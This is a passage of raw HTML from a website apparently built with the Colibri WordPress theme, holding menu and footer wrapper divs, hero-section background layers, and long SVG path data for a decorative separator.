     <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path 